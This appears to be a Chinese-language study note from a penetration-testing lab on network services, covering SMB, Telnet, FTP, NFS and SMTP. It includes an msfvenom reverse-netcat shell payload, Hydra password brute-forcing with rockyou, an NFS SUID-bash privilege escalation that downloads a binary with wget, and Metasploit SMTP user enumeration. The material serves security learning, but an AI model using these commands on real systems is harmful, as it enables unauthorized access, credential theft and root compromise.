网络服务
SMB
SMB - 服务器消息块协议 - 是一种客户端-服务器通信协议,
用于共享对网络上的文件、打印机、串行端口和其他资源的访问。
Enum4linux 是一个用于在 Windows 和 Linux 系统上枚举 SMB 共享的工具。它基本上是 Samba 包中工具的包装器,可以轻松快速地从与 SMB 相关的目标中提取信息。
枚举:enum4linux -a 10.10.100.12 -a 以上所有(完整的基本枚举)
可使用
smbclient //IP/[SHARE]
后面跟着标签:
-U [name] : 指定用户
-p [port] : 指定端口
在默认端口 IP 为 10.10.10.2 的计算机上以用户“suit”身份访问名为“secret”的 SMB 共享的正确语法是什么?
smbclient //10.10.10.2/secret -U suit -p 445
感兴趣的共享是否已配置为允许匿名访问:使用用户名“Anonymous”
Telnet
Telnet 是一种应用程序协议,它允许您使用 telnet 客户端连接到托管 telnet 服务器的远程计算机并在其上执行命令。
telnet 客户端将与服务器建立连接。然后客户端将成为一个虚拟终端——允许您与远程主机进行交互。
使用以下语法连接到 telnet 服务器:“telnet [ip] [port]”
Telnet 在大多数实现中已被 SSH 取代。
使用msfvenom -p cmd/unix/reverse_netcat lhost = [local tun0 ip ] lport = 4444 R
-p = 有效载荷
lhost = 我们的本地主机 IP 地址(这是您 机器的 IP 地址)
lport = 要侦听的端口(这是您计算机上的端口)
R = 以原始格式导出负载
然后生成一个以mkfifo开头的反弹shell
本地开启监听即可
FTP
文件传输协议 (FTP) 是一种用于允许通过网络远程传输文件的协议。
它使用客户端-服务器模型来执行此操作,并且——正如我们稍后将介绍的那样——以一种非常有效的方式中继命令和数据。
使用“ftp [IP]”作为该用户连接到 FTP 服务器
Hydra 是一种非常快速的在线密码破解工具,可以对 50 多种协议进行快速字典攻击,包括 Telnet、RDP、SSH、FTP、HTTP、HTTPS、SMB、多种数据库等等
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
NFS
NFS 代表“网络文件系统”,允许系统通过网络与其他人共享目录和文件。通过使用 NFS,用户和程序几乎可以像访问本地文件一样访问远程系统上的文件。它通过在服务器上安装全部或部分文件系统来实现这一点。已安装的文件系统部分可以由具有分配给每个文件的任何特权的客户端访问。
挂载 NFS 共享
mount -t nfs IP:share /tmp/mount/ -nolock
mount 执行挂载命令
-t nfs 要挂载的设备类型,然后指定它是 NFS
IP:share/,以及我们希望挂载的共享名称
-nolock 指定不使用 NLM 锁定
提权
使用标准的 Ubuntu Server 18.04 bash 可执行文件
wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
chmod +s bash
chmod +x bash
然后使用cp移动到挂载的共享目录
./bash -p 保留权限
SMTP
SMTP代表“简单邮件传输协议”。它用于处理电子邮件的发送。为了支持电子邮件服务,需要一个协议对,包括 SMTP 和 POP/IMAP。它们一起允许用户分别发送外发邮件和检索传入邮件。
可使用msfconsole
搜索smtp_version模块利用进行基本的信息收集,获得系统邮件名
下一阶段使用smtp_enum,同时使用Seclists词汇获得用户名
利用hydra爆破密码
